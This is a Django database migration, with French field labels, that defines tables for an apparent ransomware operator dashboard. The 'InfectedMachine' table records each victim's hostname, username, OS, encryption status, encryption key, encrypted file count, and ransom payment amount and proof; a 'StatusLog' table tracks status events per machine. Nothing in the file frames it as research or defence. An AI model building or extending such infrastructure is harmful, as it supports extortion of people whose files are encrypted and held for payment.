# Generated by Django 4.2.7 on 2026-02-04 21:40

from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='InfectedMachine',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('machine_id', models.CharField(max_length=255, unique=True, verbose_name='ID Machine')),
                ('hostname', models.CharField(max_length=255, verbose_name="Nom d'hôte")),
                ('username', models.CharField(max_length=255, verbose_name='Utilisateur')),
                ('os_info', models.CharField(max_length=255, verbose_name="Système d'exploitation")),
                ('is_activated', models.BooleanField(default=False, verbose_name='Activé')),
                ('is_encrypted', models.BooleanField(default=False, verbose_name='Fichiers chiffrés')),
                ('is_decrypted', models.BooleanField(default=False, verbose_name='Fichiers déchiffrés')),
                ('encryption_key', models.TextField(blank=True, null=True, verbose_name='Clé de chiffrement')),
                ('files_encrypted', models.IntegerField(default=0, verbose_name='Fichiers chiffrés')),
                ('payment_received', models.BooleanField(default=False, verbose_name='Paiement reçu')),
                ('payment_amount', models.DecimalField(decimal_places=2, default=0, max_digits=10, verbose_name='Montant')),
                ('payment_proof', models.TextField(blank=True, null=True, verbose_name='Preuve de paiement')),
                ('registered_at', models.DateTimeField(default=django.utils.timezone.now, verbose_name="Date d'enregistrement")),
                ('activated_at', models.DateTimeField(blank=True, null=True, verbose_name="Date d'activation")),
                ('encrypted_at', models.DateTimeField(blank=True, null=True, verbose_name='Date de chiffrement')),
                ('decrypted_at', models.DateTimeField(blank=True, null=True, verbose_name='Date de déchiffrement')),
                ('last_seen', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Dernière activité')),
            ],
            options={
                'verbose_name': 'Machine infectée',
                'verbose_name_plural': 'Machines infectées',
                'ordering': ['-registered_at'],
            },
        ),
        migrations.CreateModel(
            name='StatusLog',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('status', models.CharField(max_length=100, verbose_name='Statut')),
                ('details', models.TextField(blank=True, verbose_name='Détails')),
                ('timestamp', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Date/Heure')),
                ('machine', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='logs', to='dashboard.infectedmachine')),
            ],
            options={
                'verbose_name': 'Log de statut',
                'verbose_name_plural': 'Logs de statut',
                'ordering': ['-timestamp'],
            },
        ),
    ]
